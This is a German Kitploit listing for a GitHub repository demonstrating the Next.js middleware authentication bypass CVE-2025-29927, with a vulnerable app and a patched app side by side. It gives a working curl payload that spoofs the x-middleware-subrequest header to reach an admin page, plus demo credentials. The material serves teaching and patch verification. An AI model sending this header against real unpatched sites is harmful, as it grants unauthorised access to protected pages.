Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2025-29927 — Next.js CVE-2025-29927 demonstration | Kitploit
Tools/GitHubGitHub/dante01yoon/cve-2025-29927
Vulnerability AnalysisWeb Application ExploitationWeb SecurityAuthenticationMisconfigurationLearning & Education
GitHubdante01yoon/cve-2025-29927

CVE-2025-29927

Next.js CVE-2025-29927 demonstration

Repository anzeigen
vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Next.js Schwachstellen-Demo (CVE-2025-29927)

Dieses Repository enthält eine Demonstration der Next.js-Schwachstelle CVE-2025-29927, die Next.js Version 15.2.2 und früher betrifft. Die Schwachstelle ermöglicht Angreifern, Middleware-Authentifizierungsprüfungen zu umgehen, indem sie einen x-middleware-subrequest-Header setzen.

Repository-Struktur

Dies ist ein NX-Monorepo mit zwei Next.js-Anwendungen:

  1. vulnerable-app: Verwendet Next.js 15.2.2 mit der Schwachstelle
  2. fixed-app: Verwendet Next.js 15.2.3 mit implementiertem Fix

Erklärung der Schwachstelle

In Next.js-Versionen vor 15.2.3 gibt es eine Sicherheitslücke in der Middleware-Implementierung. Die Middleware validiert die Herkunft des x-middleware-subrequest-Headers nicht ordnungsgemäß, sodass Angreifer diesen Header fälschen und Middleware-basierte Authentifizierungsprüfungen umgehen können.

So führen Sie die Demo aus

Voraussetzungen

  • Node.js 18 oder neuer
  • npm oder yarn
  • Docker (optional, für containerisierte Bereitstellung)

Ausführen der verwundbaren App

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the vulnerable app
cd apps/vulnerable-app
npm install

# Start the vulnerable app
npm run dev

Die verwundbare App ist unter http://localhost:3000 verfügbar.

Ausführen der gefixten App

root@kitploit:~
# Navigate to the repository
cd nextjs-vulnerability

# Install dependencies for the fixed app
cd apps/fixed-app
npm install

# Start the fixed app
npm run dev

Die gefixte App ist unter http://localhost:3001 verfügbar.

Verwendung von Docker

Sie können die Apps auch mit Docker ausführen:

root@kitploit:~
# For the vulnerable app
cd apps/vulnerable-app
docker build -t nextjs-vulnerable .
docker run -p 3000:3000 nextjs-vulnerable

# For the fixed app
cd apps/fixed-app
docker build -t nextjs-fixed .
docker run -p 3001:3000 nextjs-fixed

Demonstration der Schwachstelle

  1. Öffnen Sie die verwundbare App (http://localhost:3000)
  2. Klicken Sie in der Navigationsleiste auf "Admin"
  3. Sie werden zur Anmeldeseite weitergeleitet, da Sie nicht authentifiziert sind
  4. Versuchen Sie nun, die Admin-Seite direkt mit der Schwachstelle aufzurufen:
root@kitploit:~
# Using curl
curl -H "x-middleware-subrequest: middleware:middleware:middleware:middleware:middleware" http://localhost:3000/admin

# Or use a browser extension like ModHeader to add the header
# and then visit http://localhost:3000/admin

Mit der verwundbaren Version (15.2.2) können Sie auf die Admin-Seite ohne Authentifizierung zugreifen, indem Sie den x-middleware-subrequest-Header hinzufügen.

Mit der gefixten Version (15.2.3) validiert die Middleware die Herkunft dieses Headers korrekt, und Sie werden weiterhin zur Anmeldeseite weitergeleitet.

Anmeldeinformationen

Für Demonstrationszwecke können Sie sich anmelden mit:

  • Benutzername: admin
  • Passwort: password123

Sicherheitsempfehlung

Wenn Sie Next.js in der Produktion verwenden, stellen Sie sicher, dass Sie auf Version 15.2.3 oder neuer aktualisieren, um sich vor dieser Schwachstelle zu schützen.

Tool herunterladen